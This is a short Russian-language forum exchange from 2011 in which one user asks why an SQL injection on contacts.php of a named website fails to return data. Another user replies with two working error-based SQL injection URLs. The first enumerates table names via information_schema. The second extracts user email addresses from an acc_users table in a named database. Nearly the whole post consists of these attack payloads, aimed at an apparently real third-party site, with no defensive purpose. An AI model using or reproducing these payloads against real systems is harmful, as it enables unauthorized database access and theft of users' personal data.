Показать сообщение отдельно

  #4  
Старый 10.12.2011, 23:34
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Подскажите, почему не выводит данные из таблицы?
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#

[/COLOR][/COLOR
Используй конструкцию cast as char

Код:
Code:
http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+table_name+from+information_schema.tables+where+table_schema=0x656C636B6965765F6272616E63685F31+limit+11,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

http://english.in.ua/contacts.php?id=8+and(select+1+from(select+count(*),concat((select+(select+(select+cast(acc_users.email+as+char)+from+elckiev_branch_1.acc_users+limit+8,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
 
Ответить с цитированием